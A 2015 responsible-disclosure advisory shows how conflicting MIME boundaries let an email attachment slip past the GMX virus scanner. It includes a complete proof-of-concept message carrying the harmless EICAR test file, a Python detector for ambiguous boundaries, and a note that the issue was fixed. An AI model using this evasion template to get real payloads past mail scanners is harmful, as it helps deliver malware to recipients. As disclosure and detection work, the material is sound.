July 2015
Please note that republishing this article in full or in part is only allowed under the conditions described here.
Bypassing GMX Virus Scanning using Conflicting MIME Boundaries
The virus scanner integrated in GMX mail can be bypassed by using conflicting MIME boundaries. This kind of evasion is described in detail in Dubious MIME - Conflicting Multipart Boundaries.
Proof Of Concept
GMX Webmail will use the second boundary 'bar' for displaying the mail and for downloading attachments. This way it provides access to the attached file 'eicar.com', which contains the Eicar test virus.
The virus scanner will instead use the first boundary 'foo' and thus will not see the attached virus.
From: foo
To: bar
Subject: eicar - conflicting boundaries
Mime-Version: 1.0
Content-type: multipart/mixed; boundary=foo
Content-type: multipart/mixed; boundary=bar

--foo
Content-type: text/plain

--bar
Content-type: application/octet-stream; name=eicar.com
Content-Transfer-Encoding: base64

WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNU
QU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo=
--bar--
--foo--
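A mail gateway can flag such a message before the scanner and the mail client each pick a different boundary. The check below is an added example, not code from the original article or from GMX; it uses Python's standard email package, and the function names and the two sample messages (with a harmless text payload) are constructed for illustration.

```python
import email
from email.message import Message
from email.utils import collapse_rfc2231_value

def declared_boundaries(msg):
    """Boundary parameter of every Content-Type header on this entity, in order."""
    found = []
    for value in msg.get_all("Content-Type", []):
        probe = Message()              # parse each header value on its own
        probe["Content-Type"] = value
        boundary = probe.get_param("boundary")
        if boundary is not None:
            found.append(collapse_rfc2231_value(boundary))
    return found

def ambiguity_findings(raw):
    """Return the reasons why two MIME parsers could disagree about `raw`."""
    raw = raw.replace("\r\n", "\n")
    msg = email.message_from_string(raw)
    findings = []
    if len(msg.get_all("Content-Type", [])) > 1:
        findings.append("duplicate Content-Type header")
    boundaries = declared_boundaries(msg)
    if len(set(boundaries)) > 1:
        findings.append("conflicting boundaries: " + ", ".join(boundaries))
    # If the body holds delimiter lines for more than one declared boundary,
    # every candidate interpretation yields parts, so the views really differ.
    body_lines = {line.rstrip() for line in raw.partition("\n\n")[2].splitlines()}
    live = [b for b in dict.fromkeys(boundaries) if "--" + b in body_lines]
    if len(live) > 1:
        findings.append("body has delimiters for: " + ", ".join(live))
    return findings

# Constructed samples, not taken from real mail.
AMBIGUOUS = (
    "From: a@example.test\nTo: b@example.test\nMime-Version: 1.0\n"
    "Content-type: multipart/mixed; boundary=foo\n"
    "Content-type: multipart/mixed; boundary=bar\n\n"
    "--foo\nContent-type: text/plain\n\n"
    "--bar\nContent-type: text/plain; name=note.txt\n\nhello\n"
    "--bar--\n--foo--\n"
)
CLEAN = (
    "From: a@example.test\nMime-Version: 1.0\n"
    "Content-type: multipart/mixed; boundary=foo\n\n"
    "--foo\nContent-type: text/plain\n\nhello\n--foo--\n"
)

if __name__ == "__main__":
    print(ambiguity_findings(AMBIGUOUS))
    print(ambiguity_findings(CLEAN))
```

Any non-empty result is a reason to reject or quarantine the message rather than to guess which boundary the recipient's client will honour.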
Responsible Disclosure
The issue was reported to GMX in 06/2015 (ticket C542162419) and fixed within a few weeks.